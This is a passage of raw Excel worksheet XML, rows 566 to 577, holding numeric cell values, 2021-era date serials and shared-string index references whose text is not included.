      <c r="AR566" t="s">
        <v>1322</v>
      </c>
      <c r="AS566" t="s">
        <v>71</v>
      </c>
      <c r="AT566" t="s">
        <v>86</v>
      </c>
      <c r="AU566">
        <v>26</v>
      </c>
      <c r="AV566">
        <v>3</v>
      </c>
      <c r="AW566">
        <v>0</v>
      </c>
      <c r="AX566">
        <v>0</v>
      </c>
      <c r="AY566">
        <v>27</v>
      </c>
      <c r="AZ566">
        <v>63</v>
      </c>
      <c r="BA566" t="s">
        <v>16854</v>
      </c>
      <c r="BB566" t="s">
        <v>15225</v>
      </c>
      <c r="BC566">
        <v>0</v>
      </c>
      <c r="BD566" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="567" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A567">
        <v>1445</v>
      </c>
      <c r="B567" t="s">
        <v>4530</v>
      </c>
      <c r="C567" t="s">
        <v>458</v>
      </c>
      <c r="D567" t="s">
        <v>4531</v>
      </c>
      <c r="E567" t="s">
        <v>843</v>
      </c>
      <c r="F567" t="s">
        <v>1368</v>
      </c>
      <c r="G567" s="1">
        <v>44337</v>
      </c>
      <c r="H567">
        <v>9903</v>
      </c>
      <c r="I567">
        <v>9903</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t="s">
        <v>4530</v>
      </c>
      <c r="AG567">
        <v>0</v>
      </c>
      <c r="AH567">
        <v>5</v>
      </c>
      <c r="AJ567">
        <v>149</v>
      </c>
      <c r="AK567" t="s">
        <v>1355</v>
      </c>
      <c r="AL567" t="s">
        <v>1356</v>
      </c>
      <c r="AM567" t="s">
        <v>4532</v>
      </c>
      <c r="AN567" t="s">
        <v>68</v>
      </c>
      <c r="AO567">
        <v>2017</v>
      </c>
      <c r="AP567">
        <v>81275215222</v>
      </c>
      <c r="AQ567" t="s">
        <v>4533</v>
      </c>
      <c r="AR567" t="s">
        <v>4530</v>
      </c>
      <c r="AS567" t="s">
        <v>71</v>
      </c>
      <c r="AT567" t="s">
        <v>72</v>
      </c>
      <c r="AU567">
        <v>0</v>
      </c>
      <c r="AV567">
        <v>0</v>
      </c>
      <c r="AW567">
        <v>4</v>
      </c>
      <c r="AX567">
        <v>0</v>
      </c>
      <c r="AY567">
        <v>7</v>
      </c>
      <c r="AZ567">
        <v>1</v>
      </c>
      <c r="BA567" t="s">
        <v>16894</v>
      </c>
      <c r="BB567" t="s">
        <v>15281</v>
      </c>
      <c r="BC567" t="s">
        <v>10222</v>
      </c>
      <c r="BD567" t="s">
        <v>9639</v>
      </c>
    </row>
    <row r="568" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A568">
        <v>1653</v>
      </c>
      <c r="B568" t="s">
        <v>4534</v>
      </c>
      <c r="C568" t="s">
        <v>477</v>
      </c>
      <c r="D568" t="s">
        <v>4535</v>
      </c>
      <c r="E568" t="s">
        <v>49</v>
      </c>
      <c r="F568" t="s">
        <v>4536</v>
      </c>
      <c r="G568" s="1">
        <v>44313</v>
      </c>
      <c r="H568">
        <v>9908</v>
      </c>
      <c r="I568">
        <v>9908</v>
      </c>
      <c r="J568">
        <v>0</v>
      </c>
      <c r="K568">
        <v>0</v>
      </c>
      <c r="L568">
        <v>0</v>
      </c>
      <c r="M568">
        <v>0</v>
      </c>
      <c r="N568">
        <v>0</v>
      </c>
      <c r="O568">
        <v>0</v>
      </c>
      <c r="P568">
        <v>0</v>
      </c>
      <c r="Q568">
        <v>0</v>
      </c>
      <c r="R568">
        <v>0</v>
      </c>
      <c r="S568">
        <v>0</v>
      </c>
      <c r="T568">
        <v>1</v>
      </c>
      <c r="U568">
        <v>0</v>
      </c>
      <c r="V568">
        <v>0</v>
      </c>
      <c r="W568">
        <v>0</v>
      </c>
      <c r="X568">
        <v>0</v>
      </c>
      <c r="Y568">
        <v>0</v>
      </c>
      <c r="Z568">
        <v>0</v>
      </c>
      <c r="AA568">
        <v>0</v>
      </c>
      <c r="AB568">
        <v>0</v>
      </c>
      <c r="AC568">
        <v>0</v>
      </c>
      <c r="AD568">
        <v>0</v>
      </c>
      <c r="AE568">
        <v>500</v>
      </c>
      <c r="AF568" t="s">
        <v>4537</v>
      </c>
      <c r="AG568">
        <v>95256</v>
      </c>
      <c r="AH568">
        <v>29</v>
      </c>
      <c r="AJ568">
        <v>382</v>
      </c>
      <c r="AK568" t="s">
        <v>2078</v>
      </c>
      <c r="AL568" t="s">
        <v>4538</v>
      </c>
      <c r="AM568" t="s">
        <v>4539</v>
      </c>
      <c r="AN568" t="s">
        <v>68</v>
      </c>
      <c r="AO568">
        <v>2016</v>
      </c>
      <c r="AP568">
        <v>85299869323</v>
      </c>
      <c r="AQ568" t="s">
        <v>4540</v>
      </c>
      <c r="AR568" t="s">
        <v>4537</v>
      </c>
      <c r="AS568" t="s">
        <v>71</v>
      </c>
      <c r="AT568" t="s">
        <v>72</v>
      </c>
      <c r="AU568">
        <v>12</v>
      </c>
      <c r="AV568">
        <v>1</v>
      </c>
      <c r="AW568">
        <v>0</v>
      </c>
      <c r="AX568">
        <v>0</v>
      </c>
      <c r="AY568">
        <v>0</v>
      </c>
      <c r="AZ568">
        <v>4</v>
      </c>
      <c r="BA568">
        <v>0</v>
      </c>
      <c r="BB568">
        <v>0</v>
      </c>
      <c r="BC568" t="s">
        <v>10991</v>
      </c>
      <c r="BD568" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="569" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A569">
        <v>1634</v>
      </c>
      <c r="B569" t="s">
        <v>4541</v>
      </c>
      <c r="C569" t="s">
        <v>318</v>
      </c>
      <c r="D569" t="s">
        <v>4542</v>
      </c>
      <c r="E569" t="s">
        <v>363</v>
      </c>
      <c r="F569" t="s">
        <v>364</v>
      </c>
      <c r="G569" s="1">
        <v>44308</v>
      </c>
      <c r="H569">
        <v>9946</v>
      </c>
      <c r="I569">
        <v>9946</v>
      </c>
      <c r="J569">
        <v>0</v>
      </c>
      <c r="K569">
        <v>0</v>
      </c>
      <c r="L569">
        <v>0</v>
      </c>
      <c r="M569">
        <v>0</v>
      </c>
      <c r="N569">
        <v>0</v>
      </c>
      <c r="O569">
        <v>0</v>
      </c>
      <c r="P569">
        <v>0</v>
      </c>
      <c r="Q569">
        <v>0</v>
      </c>
      <c r="R569">
        <v>0</v>
      </c>
      <c r="S569">
        <v>0</v>
      </c>
      <c r="T569">
        <v>1</v>
      </c>
      <c r="U569">
        <v>0</v>
      </c>
      <c r="V569">
        <v>0</v>
      </c>
      <c r="W569">
        <v>0</v>
      </c>
      <c r="X569">
        <v>0</v>
      </c>
      <c r="Y569">
        <v>0</v>
      </c>
      <c r="Z569">
        <v>0</v>
      </c>
      <c r="AA569">
        <v>0</v>
      </c>
      <c r="AB569">
        <v>0</v>
      </c>
      <c r="AC569">
        <v>0</v>
      </c>
      <c r="AD569">
        <v>0</v>
      </c>
      <c r="AE569">
        <v>1000000</v>
      </c>
      <c r="AF569" t="s">
        <v>4543</v>
      </c>
      <c r="AG569">
        <v>90214</v>
      </c>
      <c r="AH569">
        <v>26</v>
      </c>
      <c r="AJ569">
        <v>420</v>
      </c>
      <c r="AK569" t="s">
        <v>861</v>
      </c>
      <c r="AL569" t="s">
        <v>4544</v>
      </c>
      <c r="AM569" t="s">
        <v>4545</v>
      </c>
      <c r="AN569" t="s">
        <v>55</v>
      </c>
      <c r="AO569">
        <v>1980</v>
      </c>
      <c r="AP569" t="s">
        <v>4546</v>
      </c>
      <c r="AQ569" t="s">
        <v>4547</v>
      </c>
      <c r="AR569" t="s">
        <v>4548</v>
      </c>
      <c r="AS569" t="s">
        <v>371</v>
      </c>
      <c r="AT569" t="s">
        <v>58</v>
      </c>
      <c r="AU569">
        <v>0</v>
      </c>
      <c r="AV569">
        <v>0</v>
      </c>
      <c r="AW569">
        <v>2</v>
      </c>
      <c r="AX569">
        <v>5</v>
      </c>
      <c r="AY569">
        <v>2</v>
      </c>
      <c r="AZ569">
        <v>1</v>
      </c>
      <c r="BA569" t="s">
        <v>16956</v>
      </c>
      <c r="BB569" t="s">
        <v>15415</v>
      </c>
      <c r="BC569">
        <v>0</v>
      </c>
      <c r="BD569" t="s">
        <v>13547</v>
      </c>
    </row>
    <row r="570" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A570">
        <v>1559</v>
      </c>
      <c r="B570" t="s">
        <v>4549</v>
      </c>
      <c r="C570" t="s">
        <v>215</v>
      </c>
      <c r="D570" t="s">
        <v>4550</v>
      </c>
      <c r="E570" t="s">
        <v>916</v>
      </c>
      <c r="F570" t="s">
        <v>4551</v>
      </c>
      <c r="G570" s="1">
        <v>44312</v>
      </c>
      <c r="H570">
        <v>9948</v>
      </c>
      <c r="I570">
        <v>9948</v>
      </c>
      <c r="J570">
        <v>0</v>
      </c>
      <c r="K570">
        <v>0</v>
      </c>
      <c r="L570">
        <v>0</v>
      </c>
      <c r="M570">
        <v>0</v>
      </c>
      <c r="N570">
        <v>0</v>
      </c>
      <c r="O570">
        <v>0</v>
      </c>
      <c r="P570">
        <v>3</v>
      </c>
      <c r="Q570">
        <v>1</v>
      </c>
      <c r="R570">
        <v>0</v>
      </c>
      <c r="S570">
        <v>0</v>
      </c>
      <c r="T570">
        <v>1</v>
      </c>
      <c r="U570">
        <v>0</v>
      </c>
      <c r="V570">
        <v>0</v>
      </c>
      <c r="W570">
        <v>0</v>
      </c>
      <c r="X570">
        <v>0</v>
      </c>
      <c r="Y570">
        <v>0</v>
      </c>
      <c r="Z570">
        <v>0</v>
      </c>
      <c r="AA570">
        <v>30</v>
      </c>
      <c r="AB570">
        <v>50</v>
      </c>
      <c r="AC570">
        <v>0</v>
      </c>
      <c r="AD570">
        <v>0</v>
      </c>
      <c r="AE570">
        <v>1000</v>
      </c>
      <c r="AF570" t="s">
        <v>4552</v>
      </c>
      <c r="AG570">
        <v>33134</v>
      </c>
      <c r="AH570">
        <v>6</v>
      </c>
      <c r="AJ570">
        <v>144</v>
      </c>
      <c r="AK570" t="s">
        <v>4553</v>
      </c>
      <c r="AL570" t="s">
        <v>4554</v>
      </c>
      <c r="AM570" t="s">
        <v>4555</v>
      </c>
      <c r="AN570" t="s">
        <v>68</v>
      </c>
      <c r="AO570">
        <v>2001</v>
      </c>
      <c r="AP570">
        <v>85273480229</v>
      </c>
      <c r="AQ570" t="s">
        <v>4556</v>
      </c>
      <c r="AR570" t="s">
        <v>4552</v>
      </c>
      <c r="AS570" t="s">
        <v>71</v>
      </c>
      <c r="AT570" t="s">
        <v>72</v>
      </c>
      <c r="AU570">
        <v>20</v>
      </c>
      <c r="AV570">
        <v>0</v>
      </c>
      <c r="AW570">
        <v>5</v>
      </c>
      <c r="AX570">
        <v>10</v>
      </c>
      <c r="AY570">
        <v>7</v>
      </c>
      <c r="AZ570">
        <v>10</v>
      </c>
      <c r="BA570" t="s">
        <v>16934</v>
      </c>
      <c r="BB570" t="s">
        <v>15364</v>
      </c>
      <c r="BC570" t="s">
        <v>9852</v>
      </c>
      <c r="BD570" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="571" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A571">
        <v>1700</v>
      </c>
      <c r="B571" t="s">
        <v>4557</v>
      </c>
      <c r="C571" t="s">
        <v>2308</v>
      </c>
      <c r="D571" t="s">
        <v>4558</v>
      </c>
      <c r="E571" t="s">
        <v>142</v>
      </c>
      <c r="F571" t="s">
        <v>1746</v>
      </c>
      <c r="G571" s="1">
        <v>44274</v>
      </c>
      <c r="H571">
        <v>10032</v>
      </c>
      <c r="I571">
        <v>10032</v>
      </c>
      <c r="J571">
        <v>1</v>
      </c>
      <c r="K571">
        <v>0</v>
      </c>
      <c r="L571">
        <v>0</v>
      </c>
      <c r="M571">
        <v>3</v>
      </c>
      <c r="N571">
        <v>0</v>
      </c>
      <c r="O571">
        <v>0</v>
      </c>
      <c r="P571">
        <v>0</v>
      </c>
      <c r="Q571">
        <v>10</v>
      </c>
      <c r="R571">
        <v>10</v>
      </c>
      <c r="S571">
        <v>0</v>
      </c>
      <c r="T571">
        <v>1</v>
      </c>
      <c r="U571">
        <v>60000</v>
      </c>
      <c r="V571">
        <v>0</v>
      </c>
      <c r="W571">
        <v>0</v>
      </c>
      <c r="X571">
        <v>1500</v>
      </c>
      <c r="Y571">
        <v>0</v>
      </c>
      <c r="Z571">
        <v>0</v>
      </c>
      <c r="AA571">
        <v>0</v>
      </c>
      <c r="AB571">
        <v>2000</v>
      </c>
      <c r="AC571">
        <v>2000</v>
      </c>
      <c r="AD571">
        <v>0</v>
      </c>
      <c r="AE571">
        <v>5000</v>
      </c>
      <c r="AF571" t="s">
        <v>4559</v>
      </c>
      <c r="AG571">
        <v>98216</v>
      </c>
      <c r="AH571">
        <v>33</v>
      </c>
      <c r="AJ571">
        <v>478</v>
      </c>
      <c r="AK571" t="s">
        <v>4560</v>
      </c>
      <c r="AL571" t="s">
        <v>4561</v>
      </c>
      <c r="AM571" t="s">
        <v>4562</v>
      </c>
      <c r="AN571" t="s">
        <v>55</v>
      </c>
      <c r="AO571">
        <v>2019</v>
      </c>
      <c r="AP571">
        <v>8124834091</v>
      </c>
      <c r="AQ571" t="s">
        <v>4563</v>
      </c>
      <c r="AR571" t="s">
        <v>4559</v>
      </c>
      <c r="AS571" t="s">
        <v>71</v>
      </c>
      <c r="AT571" t="s">
        <v>58</v>
      </c>
      <c r="AU571">
        <v>25</v>
      </c>
      <c r="AV571">
        <v>2</v>
      </c>
      <c r="AW571">
        <v>4</v>
      </c>
      <c r="AX571">
        <v>5</v>
      </c>
      <c r="AY571">
        <v>13</v>
      </c>
      <c r="AZ571">
        <v>13</v>
      </c>
      <c r="BA571" t="s">
        <v>16974</v>
      </c>
      <c r="BB571" t="s">
        <v>15461</v>
      </c>
      <c r="BC571" t="s">
        <v>9536</v>
      </c>
      <c r="BD571" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="572" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A572">
        <v>1658</v>
      </c>
      <c r="B572" t="s">
        <v>4564</v>
      </c>
      <c r="C572" t="s">
        <v>579</v>
      </c>
      <c r="D572" t="s">
        <v>4565</v>
      </c>
      <c r="E572" t="s">
        <v>843</v>
      </c>
      <c r="F572" t="s">
        <v>1368</v>
      </c>
      <c r="G572" s="1">
        <v>44327</v>
      </c>
      <c r="H572">
        <v>10053</v>
      </c>
      <c r="I572">
        <v>10053</v>
      </c>
      <c r="J572">
        <v>0</v>
      </c>
      <c r="K572">
        <v>0</v>
      </c>
      <c r="L572">
        <v>0</v>
      </c>
      <c r="M572">
        <v>0</v>
      </c>
      <c r="N572">
        <v>0</v>
      </c>
      <c r="O572">
        <v>0</v>
      </c>
      <c r="P572">
        <v>0</v>
      </c>
      <c r="Q572">
        <v>2</v>
      </c>
      <c r="R572">
        <v>3</v>
      </c>
      <c r="S572">
        <v>0</v>
      </c>
      <c r="T572">
        <v>1</v>
      </c>
      <c r="U572">
        <v>0</v>
      </c>
      <c r="V572">
        <v>0</v>
      </c>
      <c r="W572">
        <v>0</v>
      </c>
      <c r="X572">
        <v>0</v>
      </c>
      <c r="Y572">
        <v>0</v>
      </c>
      <c r="Z572">
        <v>0</v>
      </c>
      <c r="AA572">
        <v>0</v>
      </c>
      <c r="AB572">
        <v>1000</v>
      </c>
      <c r="AC572">
        <v>2000</v>
      </c>
      <c r="AD572">
        <v>0</v>
      </c>
      <c r="AE572">
        <v>2000</v>
      </c>
      <c r="AF572" t="s">
        <v>4566</v>
      </c>
      <c r="AG572">
        <v>76116</v>
      </c>
      <c r="AH572">
        <v>23</v>
      </c>
      <c r="AJ572">
        <v>363</v>
      </c>
      <c r="AK572" t="s">
        <v>583</v>
      </c>
      <c r="AL572" t="s">
        <v>584</v>
      </c>
      <c r="AM572" t="s">
        <v>4567</v>
      </c>
      <c r="AN572" t="s">
        <v>55</v>
      </c>
      <c r="AO572">
        <v>2009</v>
      </c>
      <c r="AP572">
        <v>81346280305</v>
      </c>
      <c r="AQ572" t="s">
        <v>4568</v>
      </c>
      <c r="AR572" t="s">
        <v>4566</v>
      </c>
      <c r="AS572" t="s">
        <v>71</v>
      </c>
      <c r="AT572" t="s">
        <v>58</v>
      </c>
      <c r="AU572">
        <v>25</v>
      </c>
      <c r="AV572">
        <v>0</v>
      </c>
      <c r="AW572">
        <v>2</v>
      </c>
      <c r="AX572">
        <v>4</v>
      </c>
      <c r="AY572">
        <v>2</v>
      </c>
      <c r="AZ572">
        <v>0</v>
      </c>
      <c r="BA572" t="s">
        <v>17692</v>
      </c>
      <c r="BB572" t="s">
        <v>15431</v>
      </c>
      <c r="BC572" t="s">
        <v>9952</v>
      </c>
      <c r="BD572" t="s">
        <v>10668</v>
      </c>
    </row>
    <row r="573" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A573">
        <v>1667</v>
      </c>
      <c r="B573" t="s">
        <v>4569</v>
      </c>
      <c r="C573" t="s">
        <v>157</v>
      </c>
      <c r="D573" t="s">
        <v>4570</v>
      </c>
      <c r="E573" t="s">
        <v>4571</v>
      </c>
      <c r="F573" t="s">
        <v>4572</v>
      </c>
      <c r="G573" s="1">
        <v>44375</v>
      </c>
      <c r="H573">
        <v>10087</v>
      </c>
      <c r="I573">
        <v>10087</v>
      </c>
      <c r="J573">
        <v>0</v>
      </c>
      <c r="K573">
        <v>1</v>
      </c>
      <c r="L573">
        <v>0</v>
      </c>
      <c r="M573">
        <v>0</v>
      </c>
      <c r="N573">
        <v>0</v>
      </c>
      <c r="O573">
        <v>0</v>
      </c>
      <c r="P573">
        <v>6</v>
      </c>
      <c r="Q573">
        <v>6</v>
      </c>
      <c r="R573">
        <v>29</v>
      </c>
      <c r="S573">
        <v>20</v>
      </c>
      <c r="T573">
        <v>3</v>
      </c>
      <c r="U573">
        <v>0</v>
      </c>
      <c r="V573">
        <v>250000</v>
      </c>
      <c r="W573">
        <v>0</v>
      </c>
      <c r="X573">
        <v>0</v>
      </c>
      <c r="Y573">
        <v>0</v>
      </c>
      <c r="Z573">
        <v>0</v>
      </c>
      <c r="AA573">
        <v>270000</v>
      </c>
      <c r="AB573">
        <v>80000</v>
      </c>
      <c r="AC573">
        <v>36000</v>
      </c>
      <c r="AD573">
        <v>29000</v>
      </c>
      <c r="AE573">
        <v>150000</v>
      </c>
      <c r="AF573" t="s">
        <v>4573</v>
      </c>
      <c r="AG573">
        <v>68472</v>
      </c>
      <c r="AH573">
        <v>16</v>
      </c>
      <c r="AJ573">
        <v>237</v>
      </c>
      <c r="AK573" t="s">
        <v>377</v>
      </c>
      <c r="AL573" t="s">
        <v>378</v>
      </c>
      <c r="AM573" t="s">
        <v>4574</v>
      </c>
      <c r="AN573" t="s">
        <v>55</v>
      </c>
      <c r="AO573">
        <v>1985</v>
      </c>
      <c r="AP573" t="s">
        <v>4575</v>
      </c>
      <c r="AQ573" t="s">
        <v>4576</v>
      </c>
      <c r="AR573" t="s">
        <v>4573</v>
      </c>
      <c r="AS573" t="s">
        <v>71</v>
      </c>
      <c r="AT573" t="s">
        <v>58</v>
      </c>
      <c r="AU573">
        <v>0</v>
      </c>
      <c r="AV573">
        <v>0</v>
      </c>
      <c r="AW573">
        <v>40</v>
      </c>
      <c r="AX573">
        <v>250</v>
      </c>
      <c r="AY573">
        <v>10</v>
      </c>
      <c r="AZ573">
        <v>10</v>
      </c>
      <c r="BA573" t="s">
        <v>16965</v>
      </c>
      <c r="BB573" t="s">
        <v>15436</v>
      </c>
      <c r="BC573" t="s">
        <v>10703</v>
      </c>
      <c r="BD573" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="574" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A574">
        <v>1492</v>
      </c>
      <c r="B574" t="s">
        <v>4577</v>
      </c>
      <c r="C574" t="s">
        <v>99</v>
      </c>
      <c r="D574" t="s">
        <v>4578</v>
      </c>
      <c r="E574" t="s">
        <v>843</v>
      </c>
      <c r="F574" t="s">
        <v>2924</v>
      </c>
      <c r="G574" s="1">
        <v>44343</v>
      </c>
      <c r="H574">
        <v>10172</v>
      </c>
      <c r="I574">
        <v>10172</v>
      </c>
      <c r="J574">
        <v>0</v>
      </c>
      <c r="K574">
        <v>1</v>
      </c>
      <c r="L574">
        <v>0</v>
      </c>
      <c r="M574">
        <v>0</v>
      </c>
      <c r="N574">
        <v>0</v>
      </c>
      <c r="O574">
        <v>0</v>
      </c>
      <c r="P574">
        <v>0</v>
      </c>
      <c r="Q574">
        <v>0</v>
      </c>
      <c r="R574">
        <v>0</v>
      </c>
      <c r="S574">
        <v>1</v>
      </c>
      <c r="T574">
        <v>0</v>
      </c>
      <c r="U574">
        <v>0</v>
      </c>
      <c r="V574">
        <v>1</v>
      </c>
      <c r="W574">
        <v>0</v>
      </c>
      <c r="X574">
        <v>0</v>
      </c>
      <c r="Y574">
        <v>0</v>
      </c>
      <c r="Z574">
        <v>0</v>
      </c>
      <c r="AA574">
        <v>0</v>
      </c>
      <c r="AB574">
        <v>0</v>
      </c>
      <c r="AC574">
        <v>0</v>
      </c>
      <c r="AD574">
        <v>1</v>
      </c>
      <c r="AE574">
        <v>0</v>
      </c>
      <c r="AF574" t="s">
        <v>4579</v>
      </c>
      <c r="AG574">
        <v>11730</v>
      </c>
      <c r="AH574">
        <v>12</v>
      </c>
      <c r="AJ574">
        <v>159</v>
      </c>
      <c r="AK574" t="s">
        <v>4580</v>
      </c>
      <c r="AL574" t="s">
        <v>4581</v>
      </c>
      <c r="AM574" t="s">
        <v>4582</v>
      </c>
      <c r="AN574" t="s">
        <v>55</v>
      </c>
      <c r="AO574">
        <v>2017</v>
      </c>
      <c r="AP574" t="s">
        <v>4583</v>
      </c>
      <c r="AQ574" t="s">
        <v>4584</v>
      </c>
      <c r="AR574" t="s">
        <v>4585</v>
      </c>
      <c r="AS574" t="s">
        <v>179</v>
      </c>
      <c r="AT574" t="s">
        <v>58</v>
      </c>
      <c r="AU574">
        <v>24</v>
      </c>
      <c r="AV574">
        <v>1</v>
      </c>
      <c r="AW574">
        <v>0</v>
      </c>
      <c r="AX574">
        <v>0</v>
      </c>
      <c r="AY574">
        <v>1</v>
      </c>
      <c r="AZ574">
        <v>3</v>
      </c>
      <c r="BA574" t="s">
        <v>16913</v>
      </c>
      <c r="BB574" t="s">
        <v>15318</v>
      </c>
      <c r="BC574" t="s">
        <v>10031</v>
      </c>
      <c r="BD574">
        <v>0</v>
      </c>
    </row>
    <row r="575" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A575">
        <v>1621</v>
      </c>
      <c r="B575" t="s">
        <v>4586</v>
      </c>
      <c r="C575" t="s">
        <v>458</v>
      </c>
      <c r="D575" t="s">
        <v>4587</v>
      </c>
      <c r="E575" t="s">
        <v>363</v>
      </c>
      <c r="F575" t="s">
        <v>364</v>
      </c>
      <c r="G575" s="1">
        <v>44351</v>
      </c>
      <c r="H575">
        <v>10185</v>
      </c>
      <c r="I575">
        <v>10185</v>
      </c>
      <c r="J575">
        <v>0</v>
      </c>
      <c r="K575">
        <v>0</v>
      </c>
      <c r="L575">
        <v>0</v>
      </c>
      <c r="M575">
        <v>0</v>
      </c>
      <c r="N575">
        <v>0</v>
      </c>
      <c r="O575">
        <v>0</v>
      </c>
      <c r="P575">
        <v>0</v>
      </c>
      <c r="Q575">
        <v>0</v>
      </c>
      <c r="R575">
        <v>0</v>
      </c>
      <c r="S575">
        <v>0</v>
      </c>
      <c r="T575">
        <v>1</v>
      </c>
      <c r="U575">
        <v>0</v>
      </c>
      <c r="V575">
        <v>0</v>
      </c>
      <c r="W575">
        <v>0</v>
      </c>
      <c r="X575">
        <v>0</v>
      </c>
      <c r="Y575">
        <v>0</v>
      </c>
      <c r="Z575">
        <v>0</v>
      </c>
      <c r="AA575">
        <v>0</v>
      </c>
      <c r="AB575">
        <v>0</v>
      </c>
      <c r="AC575">
        <v>0</v>
      </c>
      <c r="AD575">
        <v>0</v>
      </c>
      <c r="AE575">
        <v>100000</v>
      </c>
      <c r="AF575" t="s">
        <v>4588</v>
      </c>
      <c r="AG575">
        <v>29471</v>
      </c>
      <c r="AH575">
        <v>5</v>
      </c>
      <c r="AJ575">
        <v>153</v>
      </c>
      <c r="AK575" t="s">
        <v>3815</v>
      </c>
      <c r="AL575" t="s">
        <v>4589</v>
      </c>
      <c r="AM575" t="s">
        <v>4590</v>
      </c>
      <c r="AN575" t="s">
        <v>55</v>
      </c>
      <c r="AO575">
        <v>2018</v>
      </c>
      <c r="AP575" t="s">
        <v>4591</v>
      </c>
      <c r="AQ575" t="s">
        <v>4592</v>
      </c>
      <c r="AR575" t="s">
        <v>4588</v>
      </c>
      <c r="AS575" t="s">
        <v>371</v>
      </c>
      <c r="AT575" t="s">
        <v>58</v>
      </c>
      <c r="AU575">
        <v>26</v>
      </c>
      <c r="AV575">
        <v>2</v>
      </c>
      <c r="AW575">
        <v>7</v>
      </c>
      <c r="AX575">
        <v>0</v>
      </c>
      <c r="AY575">
        <v>2</v>
      </c>
      <c r="AZ575">
        <v>0</v>
      </c>
      <c r="BA575" t="s">
        <v>16953</v>
      </c>
      <c r="BB575" t="s">
        <v>15408</v>
      </c>
      <c r="BC575">
        <v>0</v>
      </c>
      <c r="BD575" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="576" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A576">
        <v>959</v>
      </c>
      <c r="B576" t="s">
        <v>4593</v>
      </c>
      <c r="C576" t="s">
        <v>47</v>
      </c>
      <c r="D576" t="s">
        <v>4594</v>
      </c>
      <c r="E576" t="s">
        <v>142</v>
      </c>
      <c r="F576" t="s">
        <v>4595</v>
      </c>
      <c r="G576" s="1">
        <v>44378</v>
      </c>
      <c r="H576">
        <v>10238</v>
      </c>
      <c r="I576">
        <v>10238</v>
      </c>
      <c r="J576">
        <v>1</v>
      </c>
      <c r="K576">
        <v>1</v>
      </c>
      <c r="L576">
        <v>4</v>
      </c>
      <c r="M576">
        <v>1</v>
      </c>
      <c r="N576">
        <v>0</v>
      </c>
      <c r="O576">
        <v>0</v>
      </c>
      <c r="P576">
        <v>0</v>
      </c>
      <c r="Q576">
        <v>0</v>
      </c>
      <c r="R576">
        <v>2</v>
      </c>
      <c r="S576">
        <v>0</v>
      </c>
      <c r="T576">
        <v>1</v>
      </c>
      <c r="U576">
        <v>30000</v>
      </c>
      <c r="V576">
        <v>2000</v>
      </c>
      <c r="W576">
        <v>8000</v>
      </c>
      <c r="X576">
        <v>1500</v>
      </c>
      <c r="Y576">
        <v>0</v>
      </c>
      <c r="Z576">
        <v>0</v>
      </c>
      <c r="AA576">
        <v>0</v>
      </c>
      <c r="AB576">
        <v>0</v>
      </c>
      <c r="AC576">
        <v>3000</v>
      </c>
      <c r="AD576">
        <v>0</v>
      </c>
      <c r="AE576">
        <v>5000</v>
      </c>
      <c r="AF576" t="s">
        <v>4596</v>
      </c>
      <c r="AG576">
        <v>20242</v>
      </c>
      <c r="AH576">
        <v>2</v>
      </c>
      <c r="AJ576">
        <v>35</v>
      </c>
      <c r="AK576" t="s">
        <v>471</v>
      </c>
      <c r="AL576" t="s">
        <v>472</v>
      </c>
      <c r="AM576" t="s">
        <v>4597</v>
      </c>
      <c r="AN576" t="s">
        <v>55</v>
      </c>
      <c r="AO576">
        <v>2004</v>
      </c>
      <c r="AP576" t="s">
        <v>4598</v>
      </c>
      <c r="AQ576" t="s">
        <v>4599</v>
      </c>
      <c r="AR576" t="s">
        <v>4600</v>
      </c>
      <c r="AS576" t="s">
        <v>71</v>
      </c>
      <c r="AT576" t="s">
        <v>58</v>
      </c>
      <c r="AU576">
        <v>25</v>
      </c>
      <c r="AV576">
        <v>0</v>
      </c>
      <c r="AW576">
        <v>10</v>
      </c>
      <c r="AX576">
        <v>10</v>
      </c>
      <c r="AY576">
        <v>23</v>
      </c>
      <c r="AZ576">
        <v>33</v>
      </c>
      <c r="BA576" t="s">
        <v>16784</v>
      </c>
      <c r="BB576" t="s">
        <v>14964</v>
      </c>
      <c r="BC576">
        <v>0</v>
      </c>
      <c r="BD576">
        <v>0</v>
      </c>
    </row>
    <row r="577" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A577">
        <v>1593</v>
      </c>
      <c r="B577" t="s">
        <v>4601</v>
      </c>
      <c r="C577" t="s">
        <v>99</v>
      </c>
      <c r="D577" t="s">
        <v>4602</v>
      </c>
      <c r="E577" t="s">
        <v>131</v>
      </c>
      <c r="F577" t="s">
        <v>4603</v>
      </c>
      <c r="G577" s="1">
        <v>44369</v>
      </c>
      <c r="H577">
        <v>10353</v>
      </c>
      <c r="I577">
        <v>10353</v>
      </c>
      <c r="J577">
        <v>0</v>
      </c>
      <c r="K577">
        <v>2</v>
      </c>
      <c r="L577">
        <v>0</v>
      </c>
      <c r="M577">
        <v>0</v>
      </c>
      <c r="N577">
        <v>0</v>
      </c>
      <c r="O577">
        <v>0</v>
      </c>
      <c r="P577">
        <v>0</v>
      </c>
      <c r="Q577">
        <v>0</v>
      </c>
      <c r="R577">
        <v>0</v>
      </c>
      <c r="S577">
        <v>0</v>
      </c>
      <c r="T577">
        <v>1</v>
      </c>
      <c r="U577">
        <v>0</v>
      </c>
      <c r="V577">
        <v>2</v>
      </c>
      <c r="W577">
        <v>0</v>
      </c>
      <c r="X577">
        <v>0</v>
      </c>
      <c r="Y577">
        <v>0</v>
      </c>
      <c r="Z577">
        <v>0</v>
      </c>
      <c r="AA577">
        <v>0</v>
      </c>
      <c r="AB577">
        <v>0</v>
      </c>
      <c r="AC577">
        <v>0</v>
      </c>
      <c r="AD577">
        <v>0</v>
      </c>
      <c r="AE577">
        <v>100</v>
      </c>
      <c r="AF577" t="s">
        <v>4604</v>
      </c>
      <c r="AG577">
        <v>11710</v>
      </c>
      <c r="AH577">
        <v>12</v>
      </c>
